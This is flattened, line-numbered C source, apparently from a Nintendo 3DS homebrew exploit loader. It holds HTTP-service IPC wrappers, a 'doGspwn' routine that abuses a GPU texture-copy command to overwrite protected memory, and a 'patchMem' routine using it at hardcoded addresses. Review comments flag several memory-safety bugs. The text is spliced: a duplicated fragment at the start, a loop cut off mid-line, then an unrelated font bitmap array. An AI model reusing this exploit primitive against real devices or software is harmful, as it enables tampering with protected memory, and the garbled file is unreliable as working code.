cmdAdr)=(void*)CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue; 189 | u32 gxCommand[]= 190 | { 191 | 0x00000004, //command header (SetTextureCopy) 192 | (u32)src, //source address 193 | (u32)dst, //destination address 194 | size, //size 195 | 0xFFFFFFFF, // dim in 196 | 0xFFFFFFFF, // dim out 197 | 0x00000008, // flags 198 | 0x00000000, //unused 199 | }; 200 | 201 | u32** sharedGspCmdBuf=(u32**)(CN_GSPSHAREDBUF_ADR); 202 | nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue(sharedGspCmdBuf, gxCommand); 203 | } 204 | 205 | Result _GSPGPU_InvalidateDataCache(Handle* handle, Handle kprocess, u32* addr, u32 size) 206 | { 207 | u32* cmdbuf=getThreadCommandBuffer(); 208 | 209 | cmdbuf[0]=0x00090082; 210 | cmdbuf[1]=(u32)addr; 211 | cmdbuf[2]=size; 212 | cmdbuf[3]=0x00000000; 213 | cmdbuf[4]=(u32)kprocess; 214 | 215 | Result ret=0; 216 | if((ret=svc_sendSyncRequest(*handle)))return ret; 217 | 218 | return cmdbuf[1]; 219 | } 220 | 221 | void patchMem(Handle* gspHandle, u32 dst, u32 size, u32 start, u32 end) 222 | { 223 | Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 
size)=(void*)CN_GSPGPU_FlushDataCache_ADR; 224 | 225 | int i; 226 | _GSPGPU_InvalidateDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200); 227 | doGspwn((u32*)(dst), (u32*)(0x14100000), 0x200); 228 | svc_sleepThread(0x100000); 229 | for(i=start;i 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "text.h" 8 | 9 | #include "../../../../build/constants.h" 10 | 11 | #define TOPFBADR1 ((u8*)CN_TOPFBADR1) 12 | #define TOPFBADR2 ((u8*)CN_TOPFBADR2) 13 | 14 | int _strlen(char* str) 15 | { 16 | int l=0; 17 | while(*(str++))l++; 18 | return l; 19 | } 20 | 21 | void _strcpy(char* dst, char* src) 22 | { 23 | while(*src)*(dst++)=*(src++); 24 | *dst=0x00; 25 | } 26 | 27 | //? 28 | Result HTTPC_Initialize(Handle handle) 29 | { 30 | u32* cmdbuf=getThreadCommandBuffer(); 31 | 32 | cmdbuf[0]=0x10044; //request header code 33 | cmdbuf[1]=0x1000; //unk 34 | cmdbuf[2]=0x20; //unk 35 | 36 | Result ret=0; 37 | if((ret=svc_sendSyncRequest(handle)))return ret; 38 | 39 | return cmdbuf[1]; 40 | } 41 | 42 | Result HTTPC_CreateContext(Handle handle, char* url, Handle* contextHandle) 43 | { 44 | u32* cmdbuf=getThreadCommandBuffer(); 45 | u32 l=_strlen(url)+1; 46 | 47 | cmdbuf[0]=0x20082; //request header code 48 | cmdbuf[1]=l; 49 | cmdbuf[2]=0x01; //unk 50 | cmdbuf[3]=(l<<4)|0xA; 51 | cmdbuf[4]=(u32)url; 52 | 53 | Result ret=0; 54 | if((ret=svc_sendSyncRequest(handle)))return ret; 55 | 56 | if(contextHandle)*contextHandle=cmdbuf[2]; 57 | 58 | return cmdbuf[1]; 59 | } 60 | 61 | Result HTTPC_InitializeConnectionSession(Handle handle, Handle contextHandle) 62 | { 63 | u32* cmdbuf=getThreadCommandBuffer(); 64 | 65 | cmdbuf[0]=0x80042; //request header code 66 | cmdbuf[1]=contextHandle; 67 | cmdbuf[2]=0x20; //unk, fixed to that in code 68 | 69 | Result ret=0; 70 | if((ret=svc_sendSyncRequest(handle)))return ret; 71 | 72 | return cmdbuf[1]; 73 | } 74 | 75 | Result HTTPC_SetProxyDefault(Handle handle, Handle contextHandle) 76 | { 77 | u32* 
cmdbuf=getThreadCommandBuffer(); 78 | 79 | cmdbuf[0]=0xe0040; //request header code 80 | cmdbuf[1]=contextHandle; 81 | 82 | Result ret=0; 83 | if((ret=svc_sendSyncRequest(handle)))return ret; 84 | 85 | return cmdbuf[1]; 86 | } 87 | 88 | /* Send request 0x30040 with contextHandle. Returns the non-zero svc_sendSyncRequest() result if the send fails, otherwise cmdbuf[1] as read back after the call. */ Result HTTPC_CloseContext(Handle handle, Handle contextHandle) 89 | { 90 | u32* cmdbuf=getThreadCommandBuffer(); 91 | 92 | cmdbuf[0]=0x30040; //request header code 93 | cmdbuf[1]=contextHandle; 94 | 95 | Result ret=0; 96 | if((ret=svc_sendSyncRequest(handle)))return ret; 97 | 98 | return cmdbuf[1]; 99 | } 100 | 101 | /* Send request 0x90040 with contextHandle. Returns the non-zero send result, otherwise cmdbuf[1]. */ Result HTTPC_BeginRequest(Handle handle, Handle contextHandle) 102 | { 103 | u32* cmdbuf=getThreadCommandBuffer(); 104 | 105 | cmdbuf[0]=0x90040; //request header code 106 | cmdbuf[1]=contextHandle; 107 | 108 | Result ret=0; 109 | if((ret=svc_sendSyncRequest(handle)))return ret; 110 | 111 | return cmdbuf[1]; 112 | } 113 | 114 | /* Send request 0xB0082 with contextHandle, size, a (size<<4)|12 word and the buffer pointer. Returns the non-zero send result, otherwise cmdbuf[1]. NOTE(review): nothing here checks that buffer really holds size bytes, so the caller must pass the true capacity; the wrapper does not report how many bytes were written. */ Result HTTPC_ReceiveData(Handle handle, Handle contextHandle, u8* buffer, u32 size) 115 | { 116 | u32* cmdbuf=getThreadCommandBuffer(); 117 | 118 | cmdbuf[0]=0xB0082; //request header code 119 | cmdbuf[1]=contextHandle; 120 | cmdbuf[2]=size; 121 | cmdbuf[3]=(size<<4)|12; 122 | cmdbuf[4]=(u32)buffer; 123 | 124 | Result ret=0; 125 | if((ret=svc_sendSyncRequest(handle)))return ret; 126 | 127 | return cmdbuf[1]; 128 | } 129 | 130 | /* Send request 0x00060040 with contextHandle. After a successful send, cmdbuf[3] is stored through totalSize when that pointer is non-NULL (the result word in cmdbuf[1] is not checked first). Returns the non-zero send result, otherwise cmdbuf[1]. */ Result HTTPC_GetDownloadSizeState(Handle handle, Handle contextHandle, u32* totalSize) 131 | { 132 | u32* cmdbuf=getThreadCommandBuffer(); 133 | 134 | cmdbuf[0]=0x00060040; //request header code 135 | cmdbuf[1]=contextHandle; 136 | 137 | Result ret=0; 138 | if((ret=svc_sendSyncRequest(handle)))return ret; 139 | 140 | if(totalSize)*totalSize=cmdbuf[3]; 141 | 142 | return cmdbuf[1]; 143 | } 144 | 145 | /* Send request 0x50100 carrying the service name (copied into the command buffer from word 1) and its length in word 3, then store cmdbuf[3] through out. Returns -1 when the argument check fails, the non-zero send result if the send fails, otherwise cmdbuf[1]. NOTE(review): server is dereferenced by _strlen() before the !server test, so a NULL name faults instead of returning -1. The length is kept in a u8 although _strlen() returns int, so a name of 256 or more characters wraps and can pass the l>8 test before the unbounded _strcpy() into cmdbuf; test server first and keep the length in an int. handleptr is dereferenced without a NULL check. */ Result _srv_getServiceHandle(Handle* handleptr, Handle* out, char* server) 146 | { 147 | u8 l=_strlen(server); 148 | if(!out || !server || l>8)return -1; 149 | 150 | u32* cmdbuf=getThreadCommandBuffer(); 151 | 152 | cmdbuf[0]=0x50100; //request header code 153 | 
_strcpy((char*)&cmdbuf[1], server); 154 | cmdbuf[3]=l; 155 | cmdbuf[4]=0x0; 156 | 157 | Result ret=0; 158 | if((ret=svc_sendSyncRequest(*handleptr)))return ret; 159 | 160 | *out=cmdbuf[3]; 161 | 162 | return cmdbuf[1]; 163 | } 164 | 165 | // const u8 hexTable[]= 166 | // { 167 | // '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' 168 | // }; 169 | 170 | // void hex2str(char* out, u32 val) 171 | // { 172 | // int i; 173 | // for(i=0;i<8;i++){out[7-i]=hexTable[val&0xf];val>>=4;} 174 | // out[8]=0x00; 175 | // } 176 | 177 | // void drawHex(u32 val, int x, int y) 178 | // { 179 | // char str[9]; 180 | 181 | // hex2str(str,val); 182 | // drawString(TOPFBADR1,str,x,y); 183 | // drawString(TOPFBADR2,str,x,y); 184 | // } 185 | 186 | /* Queue one GX command with header 0x4 (labelled SetTextureCopy below), using src, dst and size as its source, destination and size words. The 8-word command is built in a local array and handed, together with the shared GSP command buffer at CN_GSPSHAREDBUF_ADR, to the routine at CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue. NOTE(review): the Result of the enqueue call is discarded, so the caller cannot tell whether the command was accepted, and src, dst and size are not validated here. */ void doGspwn(u32* src, u32* dst, u32 size) 187 | { 188 | Result (*nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue)(u32** sharedGspCmdBuf, u32* cmdAdr)=(void*)CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue; 189 | u32 gxCommand[]= 190 | { 191 | 0x00000004, //command header (SetTextureCopy) 192 | (u32)src, //source address 193 | (u32)dst, //destination address 194 | size, //size 195 | 0xFFFFFFFF, // dim in 196 | 0xFFFFFFFF, // dim out 197 | 0x00000008, // flags 198 | 0x00000000, //unused 199 | }; 200 | 201 | u32** sharedGspCmdBuf=(u32**)(CN_GSPSHAREDBUF_ADR); 202 | nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue(sharedGspCmdBuf, gxCommand); 203 | } 204 | 205 | /* Send the IPC request with header 0x00090082 (InvalidateDataCache, going by the function name) for the range addr/size, with 0 in word 3 and kprocess in word 4. Returns the non-zero svc_sendSyncRequest() result if the send fails, otherwise cmdbuf[1] as read back after the call. handle is dereferenced without a NULL check. */ Result _GSPGPU_InvalidateDataCache(Handle* handle, Handle kprocess, u32* addr, u32 size) 206 | { 207 | u32* cmdbuf=getThreadCommandBuffer(); 208 | 209 | cmdbuf[0]=0x00090082; 210 | cmdbuf[1]=(u32)addr; 211 | cmdbuf[2]=size; 212 | cmdbuf[3]=0x00000000; 213 | cmdbuf[4]=(u32)kprocess; 214 | 215 | Result ret=0; 216 | if((ret=svc_sendSyncRequest(*handle)))return ret; 217 | 218 | return cmdbuf[1]; 219 | } 220 | 221 | void patchMem(Handle* gspHandle, u32 dst, u32 size, u32 start, u32 end) 222 | { 223 | Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 
size)=(void*)CN_GSPGPU_FlushDataCache_ADR; 224 | 225 | int i; 226 | _GSPGPU_InvalidateDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200); 227 | doGspwn((u32*)(dst), (u32*)(0x14100000), 0x200); 228 | svc_sleepThread(0x100000); 229 | for(i=start;i 2 | 3 | // const u8 font_bin[2640] = { 4 | const u8 font_bin[] = { 5 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x1A, 6 | 0x78, 0x60, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 7 | 0x14, 0x7F, 0x7F, 0x14, 0x14, 0x7F, 0x7F, 0x14, 0x00, 0x12, 0x3A, 0x6B, 8 | 0x6B, 0x2E, 0x24, 0x00, 0x00, 0x63, 0x66, 0x0C, 0x98, 0x33, 0x63, 0x00, 9 | 0x00, 0x26, 0x7F, 0x59, 0x59, 0x77, 0x27, 0x05, 0x00, 0x10, 0x30, 0x60, 10 | 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x3C, 0x66, 0x42, 0x00, 0x00, 11 | 0x00, 0x00, 0x42, 0x66, 0x3C, 0x18, 0x00, 0x00, 0x10, 0x54, 0x7C, 0x38, 12 | 0x38, 0x7C, 0x54, 0x10, 0x00, 0x10, 0x10, 0x7C, 0x7C, 0x10, 0x10, 0x00, 13 | 0x00, 0x00, 0x02, 0x0E, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x10, 0x10, 0x10, 14 | 0x10, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x06, 0x00, 0x00, 0x00, 15 | 0x00, 0x02, 0x06, 0x0C, 0x18, 0x30, 0x60, 0x00, 0x00, 0x3C, 0x7E, 0x4A, 16 | 0x52, 0x7E, 0x3C, 0x00, 0x00, 0x02, 0x22, 0x7E, 0x7E, 0x02, 0x02, 0x00, 17 | 0x00, 0x26, 0x4E, 0x4A, 0x52, 0x72, 0x22, 0x00, 0x00, 0x24, 0x46, 0x52, 18 | 0x52, 0x7E, 0x2C, 0x00, 0x00, 0x18, 0x78, 0x68, 0x08, 0x7E, 0x7E, 0x08, 19 | 0x00, 0x74, 0x76, 0x52, 0x52, 0x5E, 0x5C, 0x00, 0x00, 0x3C, 0x7E, 0x52, 20 | 0x52, 0x5E, 0x0C, 0x00, 0x00, 0x40, 0x40, 0x4E, 0x7E, 0x70, 0x40, 0x00, 21 | 0x00, 0x2C, 0x7E, 0x52, 0x52, 0x7E, 0x2C, 0x00, 0x00, 0x24, 0x76, 0x52, 22 | 0x52, 0x7E, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x22, 0x22, 0x00, 0x00, 0x00, 23 | 0x00, 0x00, 0x02, 0x2E, 0x2C, 0x00, 0x00, 0x00, 0x00, 0x18, 0x3C, 0x24, 24 | 0x66, 0x42, 0x42, 0x00, 0x00, 0x28, 0x28, 0x28, 0x28, 0x28, 0x00, 0x00, 25 | 0x00, 0x42, 0x42, 0x66, 0x24, 0x3C, 0x18, 0x00, 0x00, 0x20, 0x60, 0x4A, 26 | 0x5A, 0x70, 0x20, 0x00, 0x00, 0x3E, 0x7F, 0x41, 0x59, 0x79, 
0x3A, 0x00, 27 | 0x00, 0x3E, 0x7E, 0x50, 0x50, 0x7E, 0x3E, 0x00, 0x00, 0x7E, 0x7E, 0x52, 28 | 0x52, 0x7E, 0x2C, 0x00, 0x00, 0x3C, 0x7E, 0x42, 0x42, 0x66, 0x24, 0x00, 29 | 0x00, 0x7E, 0x7E, 0x42, 0x66, 0x3C, 0x18, 0x00, 0x00, 0x7E, 0x7E, 0x52, 30 | 0x52, 0x42, 0x42, 0x00, 0x00, 0x7E, 0x7E, 0x50, 0x50, 0x40, 0x00, 0x00, 31 | 0x00, 0x3C, 0x7E, 0x42, 0x4A, 0x6E, 0x2C, 0x00, 0x00, 0x7E, 0x7E, 0x10, 32 | 0x10, 0x7E, 0x7E, 0x00, 0x00, 0x00, 0x42, 0x7E, 0x7E, 0x42, 0x00, 0x00, 33 | 0x00, 0x04, 0x06, 0x42, 0x7E, 0x7C, 0x40, 0x00, 0x00, 0x7E, 0x7E, 0x18, 34 | 0x3C, 0x66, 0x42, 0x00, 0x00, 0x7E, 0x7E, 0x02, 0x02, 0x02, 0x02, 0x00, 35 | 0x00, 0x7E, 0x7E, 0x30, 0x18, 0x30, 0x7E, 0x00, 0x00, 0x7E, 0x7E, 0x30, 36 | 0x18, 0x7E, 0x7E, 0x00, 0x00, 0x3C, 0x7E, 0x42, 0x42, 0x7E, 0x3C, 0x00, 37 | 0x00, 0x7E, 0x7E, 0x50, 0x50, 0x70, 0x20, 0x00, 0x00, 0x38, 0x7C, 0x44, 38 | 0x46, 0x7E, 0x3A, 0x00, 0x00, 0x7E, 0x7E, 0x58, 0x5C, 0x76, 0x22, 0x00, 39 | 0x00, 0x24, 0x76, 0x52, 0x4A, 0x6E, 0x24, 0x00, 0x00, 0x40, 0x40, 0x7E, 40 | 0x7E, 0x40, 0x40, 0x00, 0x00, 0x7C, 0x7E, 0x02, 0x02, 0x7E, 0x7C, 0x00, 41 | 0x00, 0x78, 0x7C, 0x06, 0x06, 0x7C, 0x78, 0x00, 0x00, 0x7E, 0x7E, 0x0C, 42 | 0x18, 0x0C, 0x7E, 0x00, 0x00, 0x46, 0x6E, 0x38, 0x38, 0x6E, 0x46, 0x00, 43 | 0x00, 0x60, 0x70, 0x1E, 0x1E, 0x70, 0x60, 0x00, 0x00, 0x46, 0x4E, 0x5A, 44 | 0x72, 0x62, 0x42, 0x00, 0x00, 0x00, 0x7F, 0x7F, 0x41, 0x41, 0x00, 0x00, 45 | 0x00, 0x40, 0x60, 0x30, 0x18, 0x0C, 0x06, 0x00, 0x00, 0x00, 0x41, 0x41, 46 | 0x7F, 0x7F, 0x00, 0x00, 0x00, 0x10, 0x30, 0x60, 0x60, 0x30, 0x10, 0x00, 47 | 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x40, 0x60, 48 | 0x30, 0x10, 0x00, 0x00, 0x00, 0x04, 0x2E, 0x2A, 0x2A, 0x3E, 0x1E, 0x00, 49 | 0x00, 0x7E, 0x7E, 0x12, 0x12, 0x1E, 0x0C, 0x00, 0x00, 0x1C, 0x3E, 0x22, 50 | 0x22, 0x22, 0x00, 0x00, 0x00, 0x0C, 0x1E, 0x12, 0x12, 0x7E, 0x7E, 0x00, 51 | 0x00, 0x1C, 0x3E, 0x2A, 0x2A, 0x3A, 0x18, 0x00, 0x00, 0x10, 0x3E, 0x7E, 52 | 0x50, 0x50, 0x00, 0x00, 0x00, 0x10, 0x3A, 0x2A, 0x2A, 
0x3A, 0x3C, 0x00, 53 | 0x00, 0x7E, 0x7E, 0x10, 0x10, 0x1E, 0x0E, 0x00, 0x00, 0x00, 0x12, 0x5E, 54 | 0x5E, 0x02, 0x00, 0x00, 0x00, 0x02, 0x02, 0x02, 0x5E, 0x5C, 0x00, 0x00, 55 | 0x00, 0x7E, 0x7E, 0x08, 0x1C, 0x16, 0x02, 0x00, 0x00, 0x00, 0x42, 0x7E, 56 | 0x7E, 0x02, 0x00, 0x00, 0x00, 0x3E, 0x3E, 0x18, 0x1C, 0x38, 0x3E, 0x1E, 57 | 0x00, 0x3E, 0x3E, 0x20, 0x20, 0x3E, 0x1E, 0x00, 0x00, 0x1C, 0x3E, 0x22, 58 | 0x22, 0x3E, 0x1C, 0x00, 0x00, 0x3E, 0x3E, 0x24, 0x24, 0x3C, 0x18, 0x00, 59 | 0x00, 0x18, 0x3C, 0x24, 0x24, 0x3E, 0x3E, 0x00, 0x00, 0x3E, 0x3E, 0x20, 60 | 0x20, 0x30, 0x10, 0x00, 0x00, 0x12, 0x3A, 0x2A, 0x2A, 0x2E, 0x24, 0x00, 61 | 0x00, 0x20, 0x20, 0x7C, 0x7E, 0x22, 0x22, 0x00, 0x00, 0x3C, 0x3E, 0x02, 62 | 0x02, 0x3E, 0x3E, 0x00, 0x00, 0x38, 0x3C, 0x06, 0x06, 0x3C, 0x38, 0x00, 63 | 0x00, 0x38, 0x3E, 0x0E, 0x1C, 0x0E, 0x3E, 0x38, 0x00, 0x22, 0x36, 0x1C, 64 | 0x1C, 0x36, 0x22, 0x00, 0x00, 0x30, 0x3A, 0x0A, 0x0A, 0x3E, 0x3C, 0x00, 65 | 0x00, 0x22, 0x26, 0x2E, 0x3A, 0x32, 0x22, 0x00, 0x00, 0x00, 0x04, 0x3B, 66 | 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00, 0x00, 67 | 0x00, 0x00, 0x20, 0x3B, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 68 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 69 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 70 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 71 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 72 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 73 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 74 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 75 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 76 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 77 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 78 | // 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 79 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 80 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 81 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 82 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 83 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 84 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 85 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 86 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 87 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 88 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 89 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 90 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 91 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 92 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 93 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 94 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 95 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0xC0, 0x03, 96 | // 0xE0, 0x03, 0xC0, 0x03, 0xE0, 0x01, 0xE0, 0x07, 0xE0, 0x03, 0xC0, 0x03, 97 | // 0x60, 0x06, 0xC0, 0x03, 0x80, 0x07, 0x60, 0x06, 0x60, 0x00, 0x60, 0x04, 98 | // 0x60, 0x06, 0xC0, 0x03, 0xE0, 0x03, 0xC0, 0x03, 0xE0, 0x03, 0xC0, 0x03, 99 | // 0xE0, 0x07, 0x60, 0x06, 0x60, 0x06, 0x60, 0x04, 0x60, 0x06, 0x60, 0x06, 100 | // 0xE0, 0x07, 0xC0, 0x03, 0x60, 0x00, 0xC0, 0x03, 0x80, 0x01, 0x00, 0x00, 101 | // 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x03, 0x60, 0x00, 102 | // 0x60, 0x00, 0x60, 0x06, 0x60, 0x06, 0x80, 0x01, 0x00, 0x03, 0x60, 0x03, 103 | // 0x60, 0x00, 
0xE0, 0x06, 0xE0, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 104 | // 0x60, 0x06, 0x60, 0x06, 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0x60, 0x04, 105 | // 0xC0, 0x03, 0x60, 0x06, 0x00, 0x03, 0xC0, 0x00, 0xC0, 0x00, 0x00, 0x03, 106 | // 0xC0, 0x03, 0x00, 0x00, 0x60, 0x07, 0xE0, 0x07, 0xE0, 0x03, 0x60, 0x00, 107 | // 0x60, 0x06, 0xE0, 0x01, 0xE0, 0x01, 0x60, 0x00, 0xE0, 0x07, 0x80, 0x01, 108 | // 0x00, 0x03, 0xE0, 0x01, 0x60, 0x00, 0xE0, 0x07, 0xE0, 0x07, 0x60, 0x06, 109 | // 0xE0, 0x03, 0x60, 0x06, 0xE0, 0x03, 0xC0, 0x00, 0x80, 0x01, 0x60, 0x06, 110 | // 0x60, 0x06, 0x60, 0x05, 0x80, 0x01, 0xC0, 0x03, 0x80, 0x01, 0xC0, 0x00, 111 | // 0x80, 0x01, 0x00, 0x03, 0x60, 0x06, 0x00, 0x00, 0x60, 0x07, 0x60, 0x06, 112 | // 0x60, 0x06, 0x60, 0x00, 0x60, 0x06, 0x60, 0x00, 0x60, 0x00, 0x60, 0x07, 113 | // 0x60, 0x06, 0x80, 0x01, 0x00, 0x03, 0xE0, 0x01, 0x60, 0x00, 0x60, 0x05, 114 | // 0x60, 0x07, 0x60, 0x06, 0x60, 0x00, 0x60, 0x06, 0xE0, 0x01, 0x00, 0x03, 115 | // 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0xE0, 0x07, 0xC0, 0x03, 0x80, 0x01, 116 | // 0xC0, 0x00, 0xC0, 0x00, 0x00, 0x03, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 117 | // 0x60, 0x00, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x03, 0x60, 0x00, 118 | // 0x60, 0x00, 0x60, 0x06, 0x60, 0x06, 0x80, 0x01, 0x60, 0x03, 0x60, 0x03, 119 | // 0x60, 0x00, 0x60, 0x04, 0x60, 0x06, 0x60, 0x06, 0x60, 0x00, 0xC0, 0x03, 120 | // 0x60, 0x03, 0x60, 0x06, 0x80, 0x01, 0x60, 0x06, 0xC0, 0x03, 0xE0, 0x06, 121 | // 0x60, 0x06, 0x80, 0x01, 0x60, 0x00, 0xC0, 0x00, 0x00, 0x06, 0x00, 0x03, 122 | // 0x00, 0x00, 0x00, 0x00, 0x60, 0x04, 0x60, 0x06, 0xE0, 0x03, 0xC0, 0x03, 123 | // 0xE0, 0x01, 0xE0, 0x07, 0x60, 0x00, 0xC0, 0x03, 0x60, 0x06, 0xC0, 0x03, 124 | // 0xC0, 0x01, 0x60, 0x06, 0xE0, 0x07, 0x60, 0x04, 0x60, 0x06, 0xC0, 0x03, 125 | // 0x60, 0x00, 0x00, 0x07, 0x60, 0x06, 0xC0, 0x03, 0x80, 0x01, 0xC0, 0x03, 126 | // 0x80, 0x01, 0x60, 0x04, 0x60, 0x06, 0x80, 0x01, 0xE0, 0x07, 0xC0, 0x00, 127 | // 0x00, 0x04, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x00, 
0x00, 128 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 129 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 130 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 131 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 132 | // 0x00, 0x00, 0xC0, 0x03, 0x00, 0x00, 0xC0, 0x03, 0x00, 0x00, 0xE0, 0x07, 133 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 134 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 135 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 136 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 137 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 138 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 139 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 140 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 141 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 142 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 143 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 144 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 145 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 146 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 147 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 148 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 149 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 150 | // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 